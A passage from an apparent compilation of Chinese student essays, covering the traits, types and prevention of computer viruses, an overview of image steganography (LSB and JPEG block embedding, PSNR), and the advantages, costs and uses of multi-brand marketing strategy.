①感染性。计算机病毒的感染性也称为寄生性，是指计算机病毒程序嵌入到宿主程序中，依赖于宿主程序的执行而生成的特性。计算机病毒的感染性是计算机病毒的根本属性，是判断一个程序是否为病毒程序的主要依据。②隐蔽性。隐蔽性是计算机病毒的基本特征之一。从计算机病毒隐藏的位置来看，不同的病毒隐藏在不同的位置，有的隐藏在扇区中，有的则以隐藏文件的形式出现，让人防不胜防。③潜伏性。计算机病毒的潜伏性是指其具有依附于其他媒体而寄生的能力，通过修改其他程序而把自身的复制体嵌入到其他程序或者磁盘的引导区甚至硬盘的主引导区中寄生。④可触发性。计算机病毒一般都具有一个触发条件：或者触发其感染，即在一定的条件下激活一个病毒的感染机制使之进行感染；或者触发其发作，即在一定的条件下激活病毒的表现攻击破坏部本论文由整理提供分。⑤衍生性。计算机病毒的衍生性是指计算机病毒的制造者依据个人的主观愿望，对某一个已知病毒程序进行修改而衍生出另外一中或多种来源于同一种病毒，而又不同于源病毒程序的病毒程序，即源病毒程序的变种。这也许就是病毒种类繁多、复杂的原因之一。⑥破坏性。计算机病毒的破坏性取决于计算机病毒制造者的目的和水平，它可以直接破坏计算机数据信息、抢占系统资源、影响计算机运行速度以及对计算机硬件构成破坏等。正是由于计算机病毒可怕的破坏性才使得计算机病毒令人如此恐怖。

3计算机病毒的类型

对于计算机病毒的类型，不同的范畴有着不同的类型定义。下面就简单介绍一种计算机病毒的分类：

①引导区病毒。引导区病毒隐藏在硬盘或软盘的引导区，当计算机从感染了引导区病毒的硬盘或软盘启动，或当计算机从受感染的软盘里读取数据时，引导区病毒就开始发作。②文件型病毒。文件型病毒寄生在其他文件中，常常通过对病毒的编码加密或是使用其他技术来隐藏自己。③脚本病毒。脚本病毒依赖一种特殊的脚本语言来起作用，同时需要主软件或是应用环境能够正确地识别和翻译这种脚本语言中嵌套的命令。④“特洛伊木马”程序。特洛伊木马程序比起其他各种恶意的软件来说都更加了解用户的心里状态——这种程序的创作者用在怎么样使运行特洛伊木马程序的功夫可能和他们创作木马的时间一样多。

4计算机病毒的发展趋势

传统的计算机病毒是指利用网络进行传播的一类病毒的总称。而现在网络时代的计算机病毒，已经不是如此单纯的一个概念，它被溶进了更多的东西。如今的计算机病毒是指以网络为平台，对计算机安全产生安全的所有程序的总和。

4.1“间谍”式木马病毒出现。如果说传统木马病毒是个骗子的话，那么现在的木马病毒则更像一个活生生的间谍。如今“间谍本论文由整理提供”式木马病毒一般是指利用系统漏洞进入用户的计算机系统，通过修改注册表自动启动，运行时故意不被察觉，将用户计算机系统中的所有信息都暴露在网络中的病毒程序。

4.2可以自我完善的蠕虫病毒出现。如今的蠕虫病毒除了利用网络缺陷外，更多地利用了一些新的骗人技术。如：“密码”病毒是利用人们的好奇心理，诱使用户来主动运行病毒，等等。

4.3黑客程序。随着网络的发展与人们日益增长的安全需求，必须重新来审视黑客程序。黑客程序一般都有攻击性，它会利用漏洞在远程控制计算机，甚至直接破坏计算机。黑客程序会与木马程序相结合，对计算机安全构成威胁，所以黑客程序也是一种计算机病毒。

总之，现在的计算机病毒都呈现出隐蔽性、欺骗性等复杂的特点，让人们在毫无警觉的情况下使计算机系统遭到破坏。

5计算机病毒的预防措施

5.1引导型病毒的预防引导性病毒一般在启动计算机时，优先获得控制权，强占内存。通常情况下，只要不用软盘或者只用“干净的”软盘启动系统，是不会染上引导型病毒的。对软盘进行写保护，则可以很好地保护软盘不被非法写入，从而不被感染上启动型病毒。但要保护硬盘的安全，除了从操作方面注意外，只有采取用软盘来保护硬盘的措施。

5.2文件型病毒的预防文本论文由整理提供件型病毒的预防方法是在源程序中增加自检及清楚病毒的功能。这种方法可以使得可执行文件从一生成就具有抗病毒的能力，从而可以保证可执行文件的干净。自检清除功能部分和可执行文件的其他文件融为一体，不会和程序的其他功能冲突，也使得病毒制造者无法造出针对性的病毒来。可执行文件染不上病毒，文件型病毒就无法传播了。

5.3个性化的预防措施计算机病毒的感染总是带有普遍性的或大众化的，以使计算机病毒范围尽可能的广，所以有时一些个性化的处理可能对计算机病毒的预防或者免疫具有非常好的效果。如：给一些系统文件改名或扩展名；对一些文件甚至子目录加密。使得计算机病毒搜索不到这些系统文件。

5.4加强IT行业从业人员的职业道德教育关于计算机病毒的防治，除了从技术层面来加以维护和防治外，加强对计算机从业人员（在此指的是IT行业的“精英”，可以制造计算机病毒的高智商人群）的职业道德教育显得也极其重要。如果他们有着很高的职业道德，他们就不会对网络安全构成威胁，令全世界计算机用户为之紧张。反而可以可以在计算机领域为人类作出积极而巨大的贡献。

5.5完善计算机病毒防治方面的法律法规在加强对计算机行业高智商从业人员进行道德教育的同时，也应该完善计算机病毒防治方面的相关法律法规，充分发挥法律法规的约束作用。目前我国已经制定了《中华人民共和国计算机信息系统安全保护条例》、《计算机信息系统安全专用产品检测和销售许可证管理办法》等相关法律法规，此外《中华人民共和国刑法》也对危害网络安全的行为作出了规定和惩罚。超级秘书网

5.6加强国际交流与合本论文由整理提供作在经济全球化的宏观背景下，计算机网络世界早已融为一体，跨国进行计算机病毒攻击也已出现。为此，世界各国要本着维护计算机网络安全运行的高度，加强交流与合作，共同打击计算机病毒犯罪，此举已显得刻不容缓。

6结语

随着计算机网络技术的不断发展，计算机给人类经济、文化、军事和社会活动带来更多便利的同时，也带来了相当巨大的安全挑战。现代信息网络面临着各种各样的安全威胁，有来自网络外面的攻击，比如网络黑客、计算机病毒等。因此合理有效的预防是防治计算机病毒最有效，最经济省力，也是最应该值得重视的问题。研究计算机病毒与预防有利于我们正确认识、感知、防范计算机病毒的攻击，以保护计算机网络安全，使得计算机网络真正发挥其积极的作用，促进人类经济、文化、军事和社会活动的健康。

参考文献：

[1]卓新建，郑康锋，辛阳.计算机病毒原理与防治[M].北京邮电大学出版社，2007，（8）：第二版.

[2]郝文化.防黑反毒技术指南[M].机械工业出版社，2004，（1）：第一版.

[3]程胜利，谈冉，熊文龙等.计算机病毒与其防治技术[M].清华大学出版社，2004，（9）：第一版.

[4]张仁斌，李钢，侯.计算机病毒与反病毒技术[M].清华大学出版社，2006（6）.

篇7

关键词：信息隐藏；信息隐写；隐藏质量；隐藏容量

中图分类号：TP391.4

1 信息隐藏技术与传统加密技术

信息隐藏是把秘密信息隐藏到载体信息中，而在感官上不改变载体本身，实质上因为隐藏了秘密信息，虽然载体信息本身也做了修改，但人类感觉器官的具有不敏感性，而且数字多媒体信号本身具有冗余性，这使得加载了秘密信息后的信息与原有的载体信息在感官上没有明显区别，载密后的信息的使用价值也不改变。

信息隐藏技术与传统加密技术的目的都是为了保护秘密信息，但二者还是有一定区别。最主要的区别是信息隐藏技术对载体信号的改变在人的感官层面不容易被发现，可以将秘密信息隐藏于人人可见的载体中，而传统加密技术对秘密信息加密后产生的多数是没有意义的信息，容易被发现，从而有针对性的破解。换言之，通过信息隐藏技术载密后，信息在感官上没有明显变化，除了秘密发送和接收方可以访问载密信息。与加密技术结合使用称为有密钥信息隐藏，即在嵌入秘密信息前，先将秘密信息进行加密处理，同时生成一个密钥。在提取秘密信息时，拥有权限者先得到的是加密的秘密信息，要用发送方提供的正确的密钥，还原加密的秘密信息为明文。

信息隐藏技术主要有隐写术、数字水印技术、可视密码技术、潜信道、隐匿协议等方法；在具体应用中按载体信号的不同分为基于文本、基于数字图像、基于音频、基于视频等。

2 信息隐写与数字水印

隐写术是指把隐秘信息嵌入到宿主信息中来进行传输，并保证隐秘信息不被未授权的第三方发现。因此，隐写术要求大容量嵌入与较高的隐蔽性。

数字水印是基于版权保护的应用而产生的，指嵌入在数字产品中的信息。数字水印与隐写术的区别在于其应用的目的不同，隐写术的目的在于隐藏信息，而数字水印的目的在于版权保护，因此水印的鲁棒性要求较高，但嵌入容量要求较小。

3 信息隐写算法的评价

在评价信息隐藏算法时，根据信息隐藏的不同应用场合，有如下技术性能的要求：（1）不可检测性，指的是载密信号与原始信号具有相同的特点，不容易被检测出来。（2）不可感知性，指载密后的信息外观形态不因为嵌入的秘密信息而发生明显的感官变化，不易被发现是载有秘密的信息。（3）安全性，是指隐藏算法要有抗攻击能力，非授权用户即使知道该信息为载密信息而对其进行攻击，也不能破坏原有信息和提取出秘密信息。（4）鲁棒性，是对载密信号在传输过程中受到一些正常操作，载体中的隐藏信息的具有承受能力，不易损。（5）对称性，是指信息隐藏中秘密信息的嵌入和提取过程是互逆的，也就是嵌入秘密信息和提取秘密信息可以使用同一算法。（6）自恢复性，在信息传递过程中，某些操作或者变换会对载密信息造成较大的破坏。这时为了保证信息的可用，可根据破坏后留下的数据片段，恢复出秘密信息，即自恢复性。

在信息隐藏算法开发和研究过程中，人们希望可以满足以上所有的要求，但是在实际情况下，因为有些特性是互斥的，很难同时满足所有特性，可以根据实际应用场合及媒体特点侧重某些方面。通常来说，嵌入秘密信息的信息容量与算法的不可感知性和鲁棒性成反比，也就是说隐藏的信息量越大，载密后信息的越容易被发现和被损坏。

隐写术作为信息隐藏的一种应用，我们主要关注的性能参数是隐藏质量和隐藏容量。隐藏质量，是载密后对人类感官的影响程度。由于人类个体的差异，在判断同一个目标时，会有不同的评价，所以不能有效地评价含密载体与原始载体的差别大小。为了使评价更容易量化，不因为个体差异而无法准确形容和评价载密前后的差异，引入一个国际通用的评价标准峰值信噪比PSNR。PSNR是指最大可能功率和影响它的表示精度的破坏性噪声功率的比值。在隐写中用来评价载密前后信息的相似程度。秘密信息通过某个隐写算法嵌入到原始载体后，如果载密后图像与其原始载体之间的PNSR值越大，说明该算法的隐藏质量越好。但是PSNR的分数和人眼看到的视觉品质也不是完全一致，有可能PSNR较高者看起来的效果反而不如PSNR较低者。隐藏容量也叫做隐藏载荷ER，表示所嵌入的秘密信息位占整个载体图像像素点的百分比。多数算法都希望载体图像能够携带更多的信息，即有较大的隐藏容量，但隐藏容量和隐藏质量往往相互制约，当隐藏的信息容量变化时，质量也会随之变化。

4 隐写术工作原理及相关算法

在对信息隐写算法优化时主要通过两个方面的实现。一是通过人的感官特性，人眼对图像的视觉分成敏感的平滑区和迟钝的边缘区，对于平滑去减少隐藏容量，对于边缘区加大隐藏容量；二是图像也可以分区，称之为分块，对于不同特性的分块可以采用不同的嵌入算法。

主流的隐写算法是空域算法中的最低有效位LSB算法。该算法基本思想是将秘密信息嵌入到载体图像像素值的最不显著位也即最低有效位，从而达到隐藏秘密信息的目的，因为是最不显著位，所以改变这一位置对宿主图像的感官效果不产生影响。LSB的基本步骤是：把秘密信息转换为二进制数据，将秘密二进制数据与像素最低有效位对比，若相同，保留信息，否则将载体像素的最低有效位用最低秘密信息直接替换，就得到了载密二进制信息，最后将该二进制数据转换为十进制像素值，也就是含有秘密信息的图像。最小有效位算法容易实现，而且嵌入信息容量大，是当前各种衍生算法的根本核心。

本文在这里介绍一种基于JPEG图像的分块隐写算法。首先把秘密信息转化为二进制信息，将图像分成8*8的分块，根据量化后的离散余弦变换系数DCT，计算分块的不为零的交流系数个数。根据隐藏的容量的大小，确定阈值。根据阈值将图像块分成人眼敏感程度不同的三种类型，不同类型的分块采取不同的隐藏算法嵌入数据。人眼不敏感的子块，嵌入较大量信息，仍然可以保持较好的隐藏质量，反之人眼较敏感的分块，为了保证隐藏质量，嵌入较小量信息。在进行秘密信息提取时，分块提取也就是嵌入过程的逆过程，再把所有分块中提取的秘密信息合成原有秘密信息。通过实验数据表明，该算法有效地平衡了隐藏质量和隐藏容量之间的关系，同时避免了方块效应，从而在隐藏质量得到保证的前提下大幅提高了隐藏容量。

通过数字隐写完成秘密通信分为嵌入过程、传输过程和提取过程三个阶段。密秘信息通过特定嵌入算法隐藏到原始载体中（也可以将秘密信息用传统方法结合秘钥加密后嵌入），形成含密载体，通过传输信道将含密载体发送出去。接收方通过隐写检测区分是否为含密载体，若是，再结合密钥对含密载体使用提取算法，提取出秘密信息。

5 结束语

信息隐写技术现在已经成为了信息安全的一个热点，广泛应用于各国军事部门、安全部门的信息加密及情报传输等方面。目前数字图像信息隐藏技术已经比较完善和成熟，但音频和视频作为网络上新兴和主流的数字媒体，是信息隐藏技术更广阔的载体领域，而且人的视觉和听觉也有不敏感性，所以基于音频和视频的隐写算法研究也将是今后信息隐写技术的工作重点。

参考文献：

[1]江小帆，戴跃伟，茅耀斌.信息隐藏技术-方法与应用[M].北京：机械工业出版社，2001.

[2]Cheng-Hsing Yang.Inverted pattern approach to improve image quality of information hiding by LSBsubstitution.Pattern Recognition，Volume 41，Issue 8，August 2008，Pages 2674-2683.

[3]徐凯平，郑洪源，丁秋林.一种基于LSB和PVD的图像信息隐藏算法研究[J].计算机应用研究，2010，27（3）：1068-1070.

[4]王现会.基于JPEG图像信息隐藏算法研究[D].广西师范大学硕士学位论文，2012.

篇8

多品牌策略就是给每一种产品冠以一个品牌名称，或是给每一类产品冠以一个品牌名称。多品牌策略主要包括两种情况：一是在不同的目标市场上，对同种产品分别使用不同的品牌；二是在同一市场上，对某种产品同时或连续使用不同的品牌。例如，宝洁公司在中国推出了四个品牌洗发水：海飞丝、飘柔、潘婷、沙宣，每一品牌都以基本功能以上的某一特殊功能为诉求点，吸引着不同需要的消费者。希望自己“免去头屑烦恼”的人会选择海飞丝；希望自己头发“营养、乌黑亮泽”的人会选择潘婷；希望自己头发“舒爽、柔顺、飘逸潇洒”的人会选择飘柔；希望自己头发“保湿、富有弹性”的人会选择沙宣。

二、多品牌策略的优点

多品牌策略在实践中屡见不鲜，多品牌策略的优点很多，主要有：

（一）多品牌具有较强的灵活性。没有一种产品是十全十美的，也没有一个市场是无懈可击的。浩瀚的市场海洋，为企业提供了许多平等竞争的机会，关键在于企业能否及时抓住机遇，在市场上抢占一席之地。见缝插针就是多品牌灵活性的一种具体表现。

（二）多品牌能充分适应市场的差异性。消费者的需求是千差万别的、复杂多样的，不同的地区有不同的风俗习惯；不同的时间有不同的审美观念；不同的人有不同的爱好追求，等等。

（三）多品牌有利于提高产品的市场占有率。多品牌策略最大的优势便是通过给每一品牌进行准确定位，从而有效地占领各个细分市场。如果企业原先单一目标顾客范围较窄，难以满足扩大市场份额的需要，此时可以考虑推出不同档次的品牌，采取不同的价格水平，形成不同的品牌形象，以抓住不同偏好的消费者。

多品牌策略不仅仅是企业满足消费需求的被动选择，也是企业制定竞争战略的主动选择。对市场攻击者和挑战者而言，其抢占市场的一个惯用伎俩就是发展出一个专门针对某一细分市场的品牌来逐渐蚕食；对市场领导者而言，与其坐等对手来占据某一细分市场，不如自己先发展出一个品牌去抢占，实施有效防御，从而锁定不同目标消费群。

三、多品牌策略的不足

当然，每个策略都不是完美的，多品牌策略也存在着缺陷，企业若在同一市场中发展多个品牌，成本成长的速度会比收入还快，在零售商与内部资源分配上，也会遇上复杂的管理难题。在推出一项品牌之前，企业通常会比较它们预期会产生的额外收入以及行销该品牌的成本。这类成本通常超乎主管的想像，因为“多品牌”策略有一项严重的限制；它会因不具规模经济而受害。一家公司会因在一个市场中推出数个品牌，而招致隐藏的成本，而且在事情发展超过某一点之后，就会有绑手绑脚之苦。

尽管隐藏成本的累积速度相当缓慢，但如果公司将太多品牌塞入这个产品类别，隐藏的成本就出现了。隐藏成本有四种可能呈现方式：

（一）成本重叠。当企业无法透过独一无二的方式为每一个品牌进行定位时，成本就会攀升。通常，品牌会在特色、属性或价格方面出现重叠，只是企业主管未意识到罢了。这些品牌彼此竞争的程度，和它们与对手品牌之间的竞争程度不相上下，而且最后通常演变为彼此互相吞噬。如此一来，公司成本的上升速度会比收入成长速度还快。

（二）效率不彰。很多公司已经运用自己的品牌开创出几项显然有利可图、但规模很小的利基。缺乏数量上的优势并未让他们的行销人员担心，因为他们力图达成的是整个品牌组合的销售最大化，而不是个别品牌的销售最大化。但是，这类的公司迟迟才了解，维持一大群品牌（而且每项品牌的运营规模都相对较小）的成本，相对而言，比推销几项大品牌的成本要高。例如，要制造各式各样的产品，工产方面需要大量的装备成本以及较长的机器停工时间，从而会导致较高的生产成本。

（三）零售商利润高昂。当企业推出多项品牌时，要为这些品牌取得零售上架空间，上架成本会高得让你不得不打退堂鼓。大型零售厂商，如美国的沃尔玛百货与欧洲的家乐福，一般在每项产品分类中只将前两大或前十大品牌上架。零售商运用领导品牌吸引顾客上门，但随后就向购物者推销自有品牌。

（四）管理难度加大。“多品牌”策略需要进行协调，包括从产品创新与包装改变，到经销商关系与零售商促销的。大型的品牌组合也需要经常进行价格变动与库存调整，这些工作会消耗所费不赀的管理资源。

此外，品牌扩增为企业带来最大成本的时候，不是现在，而是在未来。那些在市场中具有大型品牌组合的公司，经理人不断挂念在心的，往往是品牌之间的经费配置，而不是公司前途或有关竞争对手的问题。这类冲突的阴影常使企业组织挥之不去，让他们在面临更加专注的对手竞争时，显得脆弱不堪。

四、多品牌策略的应用

（一）明确品牌定位。定位意味着牺牲，意味着有所不为，而企业的扩张又希望无所不为。企业在完成资本积累开始对外扩张的过程中，若坚持统一品牌策略，让所有开发的新产品都套用原品牌，就会面临两难选择：若进行品牌延伸，尽管极为谨慎行事，采取了防范措施，但也可能出现品牌形象淡化、每一种产品都缺乏个性而被对手各个击破的风险；若放弃某些领域的品牌延伸，则意味着必须放弃一部分市场。要解决这一难题，一个可行的办法就是要采取产品定位的多品牌策略。

（二）建立内在相关性。品牌管理涉及到采购、生产、营销、财务、人力等各个环节。对多品牌企业而言，不能只关注单个品牌，而必须注意同一系列品牌之间的相互关联和影响。内在相关性主要是指，在实施多品牌策略时必须能够在几个品牌之间形成良好的资源整合和共享机制。任何一个企业的资源和精力都是有限的，因此为了充分利用企业的内外资源，可以成立完善的研发、采购公共平台，同时在渠道资源方面也实现良好的品牌互动和共享，并以完全不同的渠道策略来实现品牌间的良性竞争。品牌之间的高效整合与共享是欧莱雅取得成功的关键，其主要体现在技术和渠道这两个兼容性极强的方面。在技术方面，欧莱雅尽量发挥技术平台的相关效应。

（三）发挥企业品牌对多品牌策略的杠杆作用。多品牌策略中，品牌关系的管理还包括企业品牌和产品品牌之间关系的管理。企业品牌用于维护企业整体形象，对现有和潜在的员工来说，它是一种激励；对投资者而言，它意味着信心；对于产品品牌，它提供的是承诺。企业品牌代表的是企业的外部形象，对产品品牌有很强的杠杆作用。欧莱雅深知企业品牌的重要性，将其营销推广跨越个别产品线的产品品牌宣传，将光芒聚焦到企业品牌上来，最终形成一股激化不同产品品牌的能量。

综上所述，企业要使用多品牌策略进行市场竞争，需要注意多方面的内容。首先在品牌定位时要注意各品牌之间的关系，使各个品牌互相不冲突，并且协调各个品牌之间的内在关系，找出重点培育的品牌，以重点品牌促进其他品牌的发展，同时又需要防止那些做得不成功的品牌影响重点品牌的价值。在培育各个品牌的同时注意隐藏成本的增加，尽量减少隐藏成本，避免因为隐藏成本拖垮了各个品牌的扩张，做到了这些才能使企业的多个品牌健康地发展，使企业在竞争中获胜。

论文关键词：多品牌；品牌定位；品牌关系

论文提要单一品牌已越来越难以满足消费者的需求，实施多品牌策略成为众多企业竞争市场的手段。本文分析多品牌策略的概念、优点和缺点、使用范围、实践应用，希望对企业的品牌决策提供帮助。

主要参考文献：

［1］巨天中.品牌战略.中国经济出版社，2004.5.